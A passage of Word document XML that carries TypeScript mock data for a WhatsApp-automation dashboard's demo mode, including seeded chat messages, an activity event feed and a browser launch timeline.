          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    content: m.body,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    sender: m.fromMe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      ? { id: "me", pushname: "You", formattedName: "You" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      : { id: chatId, pushname: demoContacts.find(c =&gt; c.id === chatId)?.pushname || "User", formattedName: demoContacts.find(c =&gt; c.id === chatId)?.name || "User"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demoMessages: Record&lt;string, ReturnType&lt;typeof makeMsgs&gt;&gt; = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "12345678901@c.us": makeMsgs("12345678901@c.us", [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Hey Alice, how's the project going?", fromMe: true, mins: 120 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Going well! Just finishing up the API integration", fromMe: false, mins: 115 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Nice, do you need help with anything?", fromMe: true, mins: 110 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Actually yes, can you review the PR?", fromMe: false, mins: 60 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Sure, I'll take a look after lunch", fromMe: true, mins: 55 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Thanks! It's PR #247", fromMe: false, mins: 50 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Hey, are you coming to the meeting?", fromMe: false, mins: 2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"12345678902@c.us": makeMsgs("12345678902@c.us", [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Bob, did you push the fix?", fromMe: true, mins: 30 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Yes, just deployed to staging", fromMe: false, mins: 25 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Awesome, checking now", fromMe: true, mins: 20 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Got it, thanks!", fromMe: false, mins: 15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"120363001234567890@g.us": makeMsgs("120363001234567890@g.us", [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "New release notes drafted", fromMe: false, mins: 30 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Looking good 👍", fromMe: true, mins: 25 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Should we deploy tonight?", fromMe: false, mins: 10 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "Let's wait for CI to finish first", fromMe: true, mins: 5 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "CI passed! ✅", fromMe: false, mins: 3 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    { body: "The new build is passing!", fromMe: false, mins: 1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Events (pre-seeded activity feed) ───────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export type DemoEvent = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  id: number</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args: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let _eventId = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const makeEvent = (name: string, minsAgo: number, payload?: unknown): DemoEvent =&gt; ({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  id: _eventId++,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  timestamp: new Date(ago(minsAgo)).toLocaleTimeString(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  name,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  args: payload ? [payload]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demoEvents: DemoEvent[] = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 1, { from: "12345678901@c.us", body: "Hey, are you coming to the meeting?", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("ack.changed", 1.5, { messageId: "msg_001", ack: 3 }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 2, { from: "120363001234567890@g.us", body: "The new build is passing!", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("device.battery", 3, { battery: 87, plugged: false }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 5, { from: "12345678906@c.us", body: "The new pricing looks good", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("ack.changed", 5.5, { messageId: "msg_005", ack: 2 }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("group.participants.changed.global", 7, { groupId: "120363001234567890@g.us", action: "add", who: "12345678920@c.us" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 8, { from: "120363009876543210@g.us", body: "Q1 report is ready for review", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("session.state.changed", 10, { prev: "AUTHENTICATING", next: "READY", reason: "session_loaded" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 12, { from: "120363003333333333@g.us", body: "Issue #42 is fixed in main", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("ack.changed", 13, { messageId: "msg_010", ack: 3 }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 15, { from: "12345678902@c.us", body: "Got it, thanks!", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("reaction.added", 17, { messageId: "msg_003", emoji: "👍", from: "12345678904@c.us" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 20, { from: "12345678902@c.us", body: "Yes, just deployed to staging", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("call.incoming", 25, { from: "12345678905@c.us", isVideo: false }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("device.battery", 30, { battery: 89, plugged: true }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 32, { from: "12345678904@c.us", body: "Can you send the API docs link?", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("label.changed", 35, { labelId: "important", action: "added" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 40, { from: "12345678903@c.us", body: "Invoice attached 📎", type: "document" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("chat.opened", 42, { chatId: "12345678901@c.us" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("group.addedToGroup", 50, { groupId: "120363005555555555@g.us", by: "12345678910@c.us" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 55, { from: "12345678901@c.us", body: "Thanks! It's PR #247", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("ack.changed", 56, { messageId: "msg_020", ack: 1 }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 60, { from: "120363005555555555@g.us", body: "Dinner at 7pm?", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("session.connection.reconnected", 75, { downtimeMs: 3200 }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("session.connection.disconnected", 78, { reason: "transport_close" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("device.plugged", 80, { plugged: true, battery: 72 }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 90, { from: "12345678901@c.us", body: "Actually yes, can you review the PR?", type: "chat" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("commerce.order", 100, { orderId: "ORD-2025-042", from: "12345678903@c.us" }),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  makeEvent("message.received", 110, { from: "12345678901@c.us", body: "Going well! Just finishing up the API integration", type: "chat"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 that drip-feed in demo mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const demoEventDrips: Array&lt;{ name: string; payload?: unknown }&gt; = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "message.received", payload: { from: "12345678913@c.us", body: "Just checking in!", type: "chat" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "ack.changed", payload: { messageId: "msg_drip_1", ack: 3 } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "device.battery", payload: { battery: 86, plugged: false } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "message.received", payload: { from: "120363001234567890@g.us", body: "Deployment complete 🚀", type: "chat" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "reaction.added", payload: { messageId: "msg_drip_2", emoji: "❤️", from: "12345678905@c.us" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "message.received", payload: { from: "12345678906@c.us", body: "Meeting rescheduled to 4pm", type: "chat" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "ack.changed", payload: { messageId: "msg_drip_3", ack: 2 } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "chat.state", payload: { chatId: "12345678901@c.us", state: "composing" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "message.received", payload: { from: "12345678914@c.us", body: "Can you review this design?", type: "image" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { name: "group.participants.changed.global", payload: { groupId: "120363002222222222@g.us", action: "remove", who: "12345678921@c.us"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Timeline (for health page) ───────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const demoLaunchTimeline = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.create.start", status: "done" as const, durationMs: 12, details: { configSummary: { sessionId: "my-session", headless: false } } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.config.setup", status: "done" as const, durationMs: 5 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.logging.setup", status: "done" as const, durationMs: 3 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.update.check", status: "done" as const, durationMs: 430, details: { updateAvailable: false, latestVersion: "5.0.0" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.browser.init", status: "done" as const, durationMs: 2340, details: { pid: 48291, headless: false } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.page.init", status: "done" as const, durationMs: 890, details: { userAgent: "Mozilla/5.0...", viewport: { w: 1920, h: 1080 } } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
